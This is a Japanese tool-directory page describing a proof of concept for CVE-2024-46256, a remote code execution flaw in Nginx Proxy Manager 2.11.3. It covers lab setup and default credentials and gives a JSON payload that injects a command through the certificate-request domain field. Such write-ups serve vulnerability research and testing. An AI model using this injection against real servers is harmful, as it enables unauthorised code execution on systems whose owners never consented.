Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-46256 — CVE-2024-46256 ツール | Kitploit
ツール/GitHubGitHub/kimtangker/cve-2024-46256
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

CVE-2024-46256 ツール

リポジトリを見る
9ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-46256 Nginx Proxy Manager RCE脆弱性解析

環境構築

1. Nginx Proxy Manager 2.11.3環境の実行

root@kitploit:~

docker-compose up -d

または自動スクリプトを使用できます:

root@kitploit:~

python setup_environment.py

2. Nginx Proxy Managerへのアクセス

  • URL: http://localhost:81

  • 初期設定完了後にテストを実施

  • デフォルト管理アカウントでログイン (メール: [email protected] / パスワード: changeme)

  • 証明書発行関連機能へのアクセス権限を確認

脆弱性情報

  • CVE ID: CVE-2024-46256

  • 製品: Nginx Proxy Manager

  • バージョン: 2.11.3

  • 脆弱性タイプ: Remote Code Execution (RCE)

  • CVSS: High

PoCコード

PoCは、認証済みユーザーが証明書発行(例: Let's Encrypt)リクエスト過程でドメイン名フィールドにテンプレート/コマンドインジェクションを実行し、RCEを引き起こします。

ペイロード例(概念例):

root@kitploit:~
{
  "domain_names": ["test.com\"||{command}||\\n test.com\""],
  "meta": {
    "dns_challenge": false,
    "letsencrypt_agree": true,
    "letsencrypt_email": "[email protected]"
  },
  "provider": "letsencrypt"
}

解析環境

  • OS: Windows 10

  • Docker: 最新バージョン

  • Nginx Proxy Manager: 2.11.3

ツールをダウンロード